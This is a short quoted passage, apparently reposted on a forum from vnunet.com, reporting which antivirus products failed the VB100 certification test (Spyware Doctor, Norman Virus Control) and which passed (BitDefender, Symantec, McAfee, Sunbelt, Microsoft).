Other notable security products failing the VB100 test included PC Tools' Spyware Doctor, which recorded two false positives, and Norman Virus Control, which missed 14 samples and recorded six false positives.

Companies whose products passed the test included BitDefender, Symantec, McAfee, Sunbelt and Microsoft.
[/QUOTE]

Source: http://www.vnunet.com
